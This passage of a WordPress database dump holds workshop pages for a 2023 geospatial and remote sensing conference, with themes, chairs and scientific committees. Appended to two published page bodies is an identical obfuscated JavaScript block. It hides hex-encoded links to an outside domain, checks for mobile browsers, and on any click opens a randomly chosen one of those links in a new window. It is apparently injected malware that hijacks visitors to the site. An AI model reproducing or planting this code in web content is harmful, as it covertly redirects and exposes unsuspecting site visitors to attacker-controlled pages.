Emirates</li>\r\n 	<li>Alex Bruskin, Senticore Technologies LLC, USA<u></u><u></u></li>\r\n</ul>\r\n<h5><u>Supporting ISPRS <strong>Working</strong> Groups:</u></h5>\r\nTo be confirmed by the following and other possible WGs:\r\n<ul>\r\n 	<li>WG II/4 “AI / ML for Geospatial Data”</li>\r\n 	<li>WG IV/2 “Artificial Intelligence and Uncertainty Modeling in Spatial Analysis”</li>\r\n 	<li>WG IV/3 “Geo-Computation and Geo-Simulation”</li>\r\n 	<li>WG IV/9 “Spatially  Enabled Urban and Regional Digital Twins”</li>\r\n</ul>\r\n&nbsp;\r\n<h5><u><strong>Publication of the workshop contributions:</strong> </u></h5>\r\nAccepted full papers and extended abstracts will appear at ISPRS Annals and ISPRS Archives, respectively, dedicated to this symposium after the peer-review process.[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Advanced Data Preparation and Data Management for Geospatial and Remote Sensing Scenarios</strong>','','publish','closed','closed','','advanced-data-preparation-and-data-management-for-geospatial-and-remote-sensing-scenarios','','','2023-02-05 14:21:47','2023-02-05 14:21:47','',0,'https://gsw2023.com/?post_type=dt_portfolio&#038;p=2993',0,'dt_portfolio','',0),
(2994,1,'2022-11-04 20:28:49','2022-11-04 20:28:49','','ws18m1','','inherit','open','closed','','ws18m1','','','2022-11-04 20:28:49','2022-11-04 20:28:49','',2993,'https://gsw2023.com/wp-content/uploads/2022/11/ws18m1.jpg',0,'attachment','image/jpeg',0),
(2995,1,'2022-11-04 20:29:26','2022-11-04 20:29:26','','<strong>Advanced Data Preparation and Data Management for Geospatial and Remote Sensing Scenarios</strong>','','inherit','closed','closed','','2993-revision-v1','','','2022-11-04 20:29:26','2022-11-04 20:29:26','',2993,'https://gsw2023.com/?p=2995',0,'revision','',0),
(2996,1,'2022-11-04 20:31:03','2022-11-04 20:31:03','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3019\" img_size=\"600x400\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\r\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\">Satellite Remote Sensing and Its Applications</span></strong></h5>\r\n<h5></h5>\r\n<p>&nbsp;</p>\r\n<h5 style=\"text-align: justify; color: black;\">Satellite-based Remote Sensing plays a vital role in a wide spectrum of applications. In this workshop, we target areas related to advancing high-resolution and mid-resolution remote sensing data acquisition and sensor modeling combined with new data processing techniques for information extraction, including machine learning and deep learning. We are also interested in advances in Remote Sensing that help find solutions to modern human problems, including combating climate change and addressing sustainable development. We encourage participation from academia, space agencies, government stakeholders and industrial research and development leaders to share their latest technology and research developments related, but not limited, to the following themes.</h5>\r\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"sky\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\r\n<h1 style=\"text-align: left;\">CHAIRS</h1>\r\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" image_paddings=\"10px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"56\"][vc_separator color=\"sky\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\r\n<h4 style=\"text-align: justify; color: blue;\"><strong>Themes of the event:</strong></h4>\r\n<p>&nbsp;</p>\r\n<h5><strong> Satellite Photogrammetry</strong></h5>\r\n<ul>\r\n<li>Stereo/multi-view image-based 3D reconstruction</li>\r\n<li>Sensor modeling and calibration</li>\r\n<li>Off-nadir satellite image geometry and true orthorectification</li>\r\n<li>Application of Neural Radiance Fields (NeRF) in satellite photogrammetry</li>\r\n</ul>\r\n<p>&nbsp;</p>\r\n<h5><strong>Urban Remote Sensing</strong></h5>\r\n<ul>\r\n<li>Thermal remote sensing and heat-loss assessment</li>\r\n<li>Machine/Deep learning for automatic data interpretation and analysis</li>\r\n<li>Urban area change detection and 2D/3D base map updating</li>\r\n<li>Disaster assessment, management, and mitigation</li>\r\n</ul>\r\n<p>&nbsp;</p>\r\n<h5><strong>Image integration and data fusion</strong></h5>\r\n<ul>\r\n<li>Sensor fusion and multi-modal image processing</li>\r\n<li>LiDAR and Multispectral data integration</li>\r\n<li>Hyperspectral image processing and data fusion</li>\r\n<li>Optical-SAR image integration</li>\r\n</ul>\r\n<p>&nbsp;</p>\r\n<h5><strong>Remote Sensing and sustainable environment</strong></h5>\r\n<ul>\r\n<li>Water Resources and Management</li>\r\n<li>Wastewater and solid waste monitoring</li>\r\n<li>Weather/atmosphere and climate change</li>\r\n<li>Forestry/agricultural and ecosystems/biodiversity</li>\r\n<li>Environmental health applications</li>\r\n<li>Coastal erosion and cryosphere</li>\r\n<li>Landuse/landcover mapping and monitoring using artificial intelligence</li>\r\n<li>Cloud-based image analysis and Google Earth Engine</li>\r\n</ul>\r\n<p>&nbsp;</p>\r\n<h5><strong>Planetary Remote Sensing and Space Agencies program development</strong></h5>\r\n<ul>\r\n<li>Planetary Remote Sensing data processing and information extraction</li>\r\n<li>Cubesat-based earth observation missions</li>\r\n</ul>\r\n<p>&nbsp;</p>\r\n<h5><strong> Scientific Committee:</strong></h5>\r\n<ul>\r\n<li>Orhan ALTAN, Istanbul Technical University</li>\r\n<li>Ammatzia Peled, University of Haifa</li>\r\n<li>Yun Zhang, University of New Brunswick</li>\r\n<li>Rongxing (Ron) Li, Tongji University</li>\r\n<li>Marco Scaioni, University Politecnico Milano</li>\r\n<li>Francesco Pirotti, University of Padova</li>\r\n<li>Saeid Homayouni, Institut national de la recherche scientifique</li>\r\n<li>BAHRAM SALEHI, State University of New York</li>\r\n</ul>\r\n<p>[/vc_column_text][vc_separator color=\"sky\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Satellite Remote Sensing and Its Applications</strong>','','publish','closed','closed','','satellite-remote-sensing-and-its-applications','','','2023-02-05 14:23:10','2023-02-05 14:23:10','',0,'https://gsw2023.com/?post_type=dt_portfolio&#038;p=2996',0,'dt_portfolio','',0),
